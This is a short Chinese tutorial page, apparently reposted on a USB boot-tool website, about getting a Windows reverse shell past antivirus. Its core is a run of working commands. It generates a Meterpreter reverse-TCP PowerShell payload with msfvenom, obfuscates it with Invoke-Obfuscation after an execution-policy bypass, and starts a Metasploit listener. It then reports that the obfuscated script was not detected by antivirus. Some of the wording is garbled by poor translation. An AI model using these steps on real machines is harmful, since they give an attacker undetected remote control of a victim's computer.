U盘PE| w764位旗舰版下载 | U盘装win7系统 | U盘启动 |win7pe | win10下载 |加入收藏土豆PE官网U盘PE,U盘装win7系统,win7pe,U盘启动,U盘装系统,w764位旗舰版下载站!
当前位置:主页 > 帮助中心 > 帮助中心 >

内网渗透之Windows反弹shell(四)

来源:http://www.tudoupe.com时间:2022-07-22

目录

Windows反壳

07powershell代码混淆

Windows反壳

07powershell代码混淆

启动Invoke-Obfuscation

powershell -ep bypass

Import-Module ./Invoke-Obfuscation.psd1

Invoke-Obfuscation

启动成功

用msfvenom生成ps1文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=4444 --arch x64 --platform wiindows -f psh-reflection -o 4444.ps1

在启动完成后设置误导脚本代码的位置

设置脚本路径+文件位置

混淆方法的选择是TOKENALL

保存混淆之后的脚本
out out.ps1

msf监听

handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.121 -P 4444

运行混淆代码,没有中毒

封锁文件执行,报复成功,花火未截获

Copyright © 2012-2014 Www.tudoupe.Com. 土豆启动 版权所有 意见建议:tdsky@tudoupe.com

土豆系统,土豆PE,win7系统下载,win7 64位旗舰版下载,u盘启动,u盘装系统,win10下载,win10正式版下载,win10 RTM正式版下载,win8下载,电脑蓝屏,IE11修复,网络受限,4K对齐,双系统,隐藏分区,系统安装不了,U盘装系统,笔记本装系统,台式机装系统,diskgenius运用,GHSOT装系统,U盘修复,U盘技巧,U盘速度,U盘不能格式化,U盘复制发生错误,U盘加密,U盘选购,开机黑屏,蓝屏,进不了系统,上不了网,打不开程序,点击无反应,系统设置,PE个性化,PE添加网络,PE维护系统

点击这里给我发消息